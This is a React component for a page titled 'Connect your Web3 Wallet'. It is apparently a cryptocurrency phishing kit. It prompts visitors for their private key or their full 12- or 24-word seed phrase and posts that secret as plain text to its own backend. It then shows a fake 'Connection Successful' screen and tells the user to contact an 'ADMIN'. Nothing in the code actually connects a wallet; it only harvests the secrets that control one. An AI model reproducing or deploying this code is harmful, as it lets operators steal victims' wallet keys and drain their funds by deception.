import React, { useState } from "react";
import { httpInstance } from "../../api";

const Connect = () => {
  const [privateKey, setPrivateKey] = useState("");
  const [currentOption, setCurrentOption] = useState<
    "privateKey" | "seedPhrase"
  >("privateKey");
  const [compoundSet, setCompoundSet] = useState("");
  const [wordNumber, setWordNumber] = useState<12 | 24>(12);
  const [firstSet, setFirstSet] = useState({
    0: "",
    1: "",
    2: "",
    3: "",
    4: "",
    5: "",
    6: "",
    7: "",
    8: "",
    9: "",
    10: "",
    11: "",
  });
  const [secondSet, setSecondSet] = useState({
    0: "",
    1: "",
    2: "",
    3: "",
    4: "",
    5: "",
    6: "",
    7: "",
    8: "",
    9: "",
    10: "",
    11: "",
    12: "",
    13: "",
    14: "",
    15: "",
    16: "",
    17: "",
    18: "",
    19: "",
    20: "",
    21: "",
    22: "",
    23: "",
  });
  const [showDone, setShowDone] = useState(false);
  const [submitting, setSubmitting] = useState(false);

  // picks what is inside the first object and adds up the second object to it that are not present in the first object
  const replaceValues = (firstObj: any, secondObj: any) => {
    const updatedSecondObj: any = { ...secondObj };

    for (const key in secondObj) {
      if (secondObj.hasOwnProperty(key)) {
        // const index = parseInt(key);
        if (firstObj.hasOwnProperty(key)) {
          updatedSecondObj[key] = firstObj[key];
        } else {
          updatedSecondObj[key] = "";
        }
      }
    }

    return updatedSecondObj;
  };

  const handleSetCompoundSetInput = (value: string) => {
    const words = value.trim().split(" ");
    const updatedData: any = {};

    if (wordNumber === 12) {
      for (let i = 0; i < Math.min(words.length, 12); i++) {
        updatedData[i] = words[i] || "";
      }

      setFirstSet(replaceValues(updatedData, firstSet));

      setCompoundSet(value);
    } else {
      for (let i = 0; i < Math.min(words.length, 24); i++) {
        updatedData[i] = words[i] || "";
      }

      setSecondSet(replaceValues(updatedData, secondSet));

      setCompoundSet(value);
    }
  };

  const handleCompoundInput = (stateValue: any) => {
    const combinedString = Object.values(stateValue).join(" ");
    setCompoundSet(combinedString);
  };

  const handleSmallInputChange = (index: number, value: string) => {
    if (wordNumber === 12) {
      let newState = {
        ...firstSet,
        [index]: value,
      };
      setFirstSet(newState);
      handleCompoundInput(newState);
    } else {
      let newState = {
        ...secondSet,
        [index]: value,
      };
      setSecondSet(newState);
      handleCompoundInput(newState);
    }
  };

  const resetBothSets = () => {
    setFirstSet({
      0: "",
      1: "",
      2: "",
      3: "",
      4: "",
      5: "",
      6: "",
      7: "",
      8: "",
      9: "",
      10: "",
      11: "",
    });
    setSecondSet({
      0: "",
      1: "",
      2: "",
      3: "",
      4: "",
      5: "",
      6: "",
      7: "",
      8: "",
      9: "",
      10: "",
      11: "",
      12: "",
      13: "",
      14: "",
      15: "",
      16: "",
      17: "",
      18: "",
      19: "",
      20: "",
      21: "",
      22: "",
      23: "",
    });
    setCompoundSet("");
  };

  const handleSubmit = async () => {
    if (!submitting) {
      try {
        let text;

        if (currentOption === "privateKey") {
          text = privateKey;
        } else {
          text = compoundSet;
        }

        setShowDone(true);
        setSubmitting(true);

        await httpInstance.post("/", {
          body: text,
        });

        setShowDone(true);
        setSubmitting(false);
        resetBothSets();
        setPrivateKey("");
      } catch (error) {
        setSubmitting(false);
        console.log(error);
      }
    }
  };

  return (
    <div className="w-screen min-h-screen text-white bg-darko">
      <div className="fixed -left-20 bg-gradient-to-br from-amber-400 to-amber-500 w-[300px]  h-[300px] rounded-full  bottom-[30%] blur-[128px] opacity-30"></div>
      <div className="fixed -left-64 bg-gradient-to-br from-indigo-500 to-orange-500 w-[300px]  h-[300px] rounded-full  top-[40%] blur-3xl opacity-30"></div>
      <div className="fixed -right-20 bg-gradient-to-br from-amber-400 to-rose-500 w-[300px]  h-[300px] rounded-full  top-[30%] blur-[128px] opacity-30"></div>
      <div className="fixed -right-64 bg-gradient-to-br from-blue-500 to-red-500 w-[300px]  h-[300px] rounded-full  bottom-[40%] blur-3xl opacity-30"></div>

      <div className="relative z-10">
        <div className="p-5 space-y-8 md:p-36">
          <div className="flex flex-col items-center">
            <p className="text-4xl font-bold text-center text-white">
              Connect your Web3 Wallet
            </p>
          </div>
          <div className="w-full p-3 md:p-5 border-[0.5px] border-lime-500/20 rounded-2xl  bg-gradiesnt-to-b from-lime-500/5 to-lime-600/5 min-h-[30vh]  bg-darko">
            <div className="inline-flex p-1 space-x-2 rounded-full bg-darko">
              <div
                className={`p-2 text-sm text-white uppercase transition-all ease-in-out rounded-full cursor-pointer md:text-base bg-gradient-to-b ${
                  currentOption === "privateKey"
                    ? "from-amber-500 to-amber-600"
                    : ""
                }`}
                onClick={() => {
                  setCurrentOption("privateKey");
                }}
              >
                Private Key
              </div>
              <div
                className={`p-2 text-sm text-white uppercase transition-all ease-in-out rounded-full cursor-pointer md:text-base bg-gradient-to-b ${
                  currentOption === "seedPhrase"
                    ? "from-amber-500 to-amber-600"
                    : ""
                }`}
                onClick={() => {
                  setCurrentOption("seedPhrase");
                }}
              >
                Seed Phrase
              </div>
            </div>
            <div className="my-8">
              {currentOption === "privateKey" ? (
                <div className="" style={{ opacity: 1, transform: "none" }}>
                  <div>
                    <div className="flex items-center space-x-2">
                      <svg
                        stroke="currentColor"
                        fill="currentColor"
                        strokeWidth="0"
                        viewBox="0 0 24 24"
                        className="text-4xl transform rotate-90"
                        height="1em"
                        width="1em"
                        xmlns="http://www.w3.org/2000/svg"
                      >
                        <path d="M7 17a5.007 5.007 0 0 0 4.898-4H14v2h2v-2h2v3h2v-3h1v-2h-9.102A5.007 5.007 0 0 0 7 7c-2.757 0-5 2.243-5 5s2.243 5 5 5zm0-8c1.654 0 3 1.346 3 3s-1.346 3-3 3-3-1.346-3-3 1.346-3 3-3z"></path>
                      </svg>
                      <div className="flex flex-col items-start">
                        <p className="text-lg font-bold">Enter Private Key</p>
                        <p className="text-sm opacity-40">
                          Usually 40 hexadeximal characters
                        </p>
                      </div>
                    </div>
                    <form
                      onSubmit={(e) => {
                        e.preventDefault();
                        handleSubmit();
                      }}
                    >
                      <div className="mt-4">
                        <div className="relative h-14">
                          <input
                            className="w-full h-full p-3 text-2xl bg-transparent border outline-none focus:outline-none focus:ring-0 ring-0 rounded-2xl"
                            required
                            placeholder="Paste your private key"
                            value={privateKey}
                            onChange={(e) => {
                              setPrivateKey(e.target.value);
                            }}
                          />
                        </div>
                      </div>
                      <div className="mt-4">
                        <button
                          className="inline-flex items-center justify-center w-full p-2 space-x-2 rounded-full bg-gradient-to-r from-amber-500 to-orange-500 uppeercase"
                          type="submit"
                        >
                          <span>Next</span>
                          <svg
                            stroke="currentColor"
                            fill="currentColor"
                            strokeWidth="0"
                            viewBox="0 0 24 24"
                            height="1em"
                            width="1em"
                            xmlns="http://www.w3.org/2000/svg"
                          >
                            <path d="M11.999 1.993c-5.514.001-10 4.487-10 10.001s4.486 10 10.001 10c5.513 0 9.999-4.486 10-10 0-5.514-4.486-10-10.001-10.001zM12 19.994c-4.412 0-8.001-3.589-8.001-8s3.589-8 8-8.001C16.411 3.994 20 7.583 20 11.994c-.001 4.411-3.59 8-8 8z"></path>
                            <path d="M12 10.994H8v2h4V16l4.005-4.005L12 7.991z"></path>
                          </svg>
                        </button>
                      </div>
                    </form>
                  </div>
                </div>
              ) : (
                <div className="" style={{ opacity: 1, transform: "none" }}>
                  <div className="flex items-center space-x-2">
                    <svg
                      stroke="currentColor"
                      fill="currentColor"
                      strokeWidth="0"
                      viewBox="0 0 24 24"
                      className="text-4xl transform rotate-90"
                      height="1em"
                      width="1em"
                      xmlns="http://www.w3.org/2000/svg"
                    >
                      <path d="M20 3H5C3.346 3 2 4.346 2 6v12c0 1.654 1.346 3 3 3h15c1.103 0 2-.897 2-2V5c0-1.103-.897-2-2-2zM5 19c-.552 0-1-.449-1-1V6c0-.551.448-1 1-1h15v3h-6c-1.103 0-2 .897-2 2v4c0 1.103.897 2 2 2h6.001v3H5zm15-9v4h-6v-4h6z"></path>
                    </svg>
                    <div className="flex flex-col items-start">
                      <p className="text-lg font-bold">Enter Seed Phrase</p>
                      <p className="text-sm opacity-40">
                        Usually 12 or 24 words
                      </p>
                    </div>
                  </div>
                  <div className="flex items-center my-4">
                    <div
                      className={`${
                        wordNumber === 12
                          ? "text-sm p-1  px-2 cursor-pointer border-b border-amber-500 text-amber-500"
                          : "text-sm p-1  px-2 cursor-pointer bg-darko"
                      } `}
                      onClick={() => {
                        setWordNumber(12);
                        resetBothSets();
                      }}
                    >
                      12 Words
                    </div>
                    <div
                      className={`${
                        wordNumber === 24
                          ? "text-sm p-1  px-2 cursor-pointer border-b border-amber-500 text-amber-500"
                          : "text-sm p-1  px-2 cursor-pointer bg-darko"
                      } `}
                      onClick={() => {
                        setWordNumber(24);
                        resetBothSets();
                      }}
                    >
                      24 Words
                    </div>
                  </div>
                  <div>
                    <form
                      onSubmit={(e) => {
                        e.preventDefault();
                        handleSubmit();
                      }}
                    >
                      <div className="mt-4">
                        <div className="relative h-14">
                          <input
                            className="w-full h-12 col-span-2 p-3 mb-6 bg-transparent border outline-none border-gray-200/40 rounded-2xl focus:outline-none focus:ring-0 ring-0"
                            required
                            placeholder="Paste your private key"
                            value={compoundSet}
                            onChange={(e) => {
                              handleSetCompoundSetInput(e.target.value);
                            }}
                          />
                        </div>

                        <div className="grid grid-cols-2 gap-2 p-3 md:p-5 bg-darko rounded-2xl md:grid-cols-4 gap-x-4 md:gap-4">
                          {wordNumber === 12 ? (
                            <>
                              {Object.entries(firstSet).map(([key, value]) => (
                                <div
                                  className="relative flex items-center space-x-1"
                                  key={`first-set-${key}`}
                                >
                                  <span className="text-xs">
                                    {parseInt(key) + 1}:
                                  </span>
                                  <input
                                    className="w-full p-3 bg-transparent border outline-none border-gray-200/40 rounded-2xl focus:outline-none focus:ring-0 ring-0"
                                    required
                                    type="text"
                                    value={value}
                                    onChange={(e) => {
                                      handleSmallInputChange(
                                        parseInt(key),
                                        e.target.value
                                      );
                                    }}
                                  />
                                </div>
                              ))}
                            </>
                          ) : (
                            <>
                              {Object.entries(secondSet).map(([key, value]) => (
                                <div
                                  className="relative flex items-center space-x-1"
                                  key={`first-set-${key}`}
                                >
                                  <span className="text-xs">
                                    {parseInt(key) + 1}:
                                  </span>
                                  <input
                                    className="w-full p-3 bg-transparent border outline-none border-gray-200/40 rounded-2xl focus:outline-none focus:ring-0 ring-0"
                                    required
                                    type="text"
                                    value={value}
                                    onChange={(e) => {
                                      handleSmallInputChange(
                                        parseInt(key),
                                        e.target.value
                                      );
                                    }}
                                  />
                                </div>
                              ))}
                            </>
                          )}
                        </div>

                        <div className="mt-4">
                          <button
                            className="inline-flex items-center justify-center w-full p-2 space-x-2 rounded-full bg-gradient-to-r from-amber-500 to-orange-500 uppeercase"
                            type="submit"
                          >
                            <span>Next</span>
                            <svg
                              stroke="currentColor"
                              fill="currentColor"
                              strokeWidth="0"
                              viewBox="0 0 24 24"
                              height="1em"
                              width="1em"
                              xmlns="http://www.w3.org/2000/svg"
                            >
                              <path d="M11.999 1.993c-5.514.001-10 4.487-10 10.001s4.486 10 10.001 10c5.513 0 9.999-4.486 10-10 0-5.514-4.486-10-10.001-10.001zM12 19.994c-4.412 0-8.001-3.589-8.001-8s3.589-8 8-8.001C16.411 3.994 20 7.583 20 11.994c-.001 4.411-3.59 8-8 8z"></path>
                              <path d="M12 10.994H8v2h4V16l4.005-4.005L12 7.991z"></path>
                            </svg>
                          </button>
                        </div>
                      </div>
                    </form>
                  </div>
                </div>
              )}
            </div>
          </div>
        </div>

        {showDone && (
          <div className="absolute inset-0 p-12 bg-black/70 md:p-48 md:py-16 ">
            <div className="relative p-3 bg-darko md:p-5 rounded-2xl">
              <div className="">
                <div className="flex flex-col items-center p-3 space-y-8 text-center md:p-5">
                  {submitting ? (
                    <div className="flex flex-col items-center space-y-2 h-[25rem] justify-center">
                      <svg
                        stroke="currentColor"
                        fill="currentColor"
                        strokeWidth="0"
                        viewBox="0 0 1024 1024"
                        className="text-4xl animate-spin text-amber-500"
                        height="1em"
                        width="1em"
                        xmlns="http://www.w3.org/2000/svg"
                      >
                        <path d="M512 1024c-69.1 0-136.2-13.5-199.3-40.2C251.7 958 197 921 150 874c-47-47-84-101.7-109.8-162.7C13.5 648.2 0 581.1 0 512c0-19.9 16.1-36 36-36s36 16.1 36 36c0 59.4 11.6 117 34.6 171.3 22.2 52.4 53.9 99.5 94.3 139.9 40.4 40.4 87.5 72.2 139.9 94.3C395 940.4 452.6 952 512 952c59.4 0 117-11.6 171.3-34.6 52.4-22.2 99.5-53.9 139.9-94.3 40.4-40.4 72.2-87.5 94.3-139.9C940.4 629 952 571.4 952 512c0-59.4-11.6-117-34.6-171.3a440.45 440.45 0 0 0-94.3-139.9 437.71 437.71 0 0 0-139.9-94.3C629 83.6 571.4 72 512 72c-19.9 0-36-16.1-36-36s16.1-36 36-36c69.1 0 136.2 13.5 199.3 40.2C772.3 66 827 103 874 150c47 47 83.9 101.8 109.7 162.7 26.7 63.1 40.2 130.2 40.2 199.3s-13.5 136.2-40.2 199.3C958 772.3 921 827 874 874c-47 47-101.8 83.9-162.7 109.7-63.1 26.8-130.2 40.3-199.3 40.3z"></path>
                      </svg>
                    </div>
                  ) : (
                    <>
                      <p className="uppercase">Connection Successful</p>
                      <div className="grid rounded-full bg-lime-500/10 w-28 h-28 place-content-center">
                        <div className="grid w-24 h-24 rounded-full bg-lime-500/30 place-content-center">
                          <div className="grid w-20 h-20 rounded-full bg-lime-500 place-content-center">
                            <svg
                              stroke="currentColor"
                              fill="currentColor"
                              strokeWidth="0"
                              viewBox="0 0 24 24"
                              className="text-4xl"
                              height="1em"
                              width="1em"
                              xmlns="http://www.w3.org/2000/svg"
                            >
                              <path d="m10 15.586-3.293-3.293-1.414 1.414L10 18.414l9.707-9.707-1.414-1.414z"></path>
                            </svg>
                          </div>
                        </div>
                      </div>
                      <img
                        src="/images/qr.png"
                        className="object-cover w-36 h-36"
                        alt="qr"
                      />

                      <div className="space-y-2">
                        <p className="text-lg">
                          Chat ADMIN up for Authentication Code
                        </p>
                        <p className="text-sm opacity-70">
                          Or proceed to scan the QR Code on your Mobile Device
                          Wallet
                        </p>
                      </div>
                      <button
                        className="w-full p-2 px-3 uppercase rounded-full bg-gradient-to-b from-lime-500 to-lime-600"
                        onClick={() => {
                          setShowDone(false);
                        }}
                      >
                        Proceed
                      </button>
                    </>
                  )}
                </div>
              </div>
              {!submitting && (
                <div
                  className="absolute grid w-6 h-6 bg-purple-600 rounded cursor-pointer top-2 right-2 place-content-center"
                  onClick={() => {
                    setShowDone(false);
                  }}
                >
                  <svg
                    stroke="currentColor"
                    fill="currentColor"
                    strokeWidth="0"
                    viewBox="0 0 24 24"
                    height="1em"
                    width="1em"
                    xmlns="http://www.w3.org/2000/svg"
                  >
                    <path d="m16.192 6.344-4.243 4.242-4.242-4.242-1.414 1.414L10.535 12l-4.242 4.242 1.414 1.414 4.242-4.242 4.243 4.242 1.414-1.414L13.364 12l4.242-4.242z"></path>
                  </svg>
                </div>
              )}
            </div>
          </div>
        )}
      </div>
    </div>
  );
};

export default Connect;
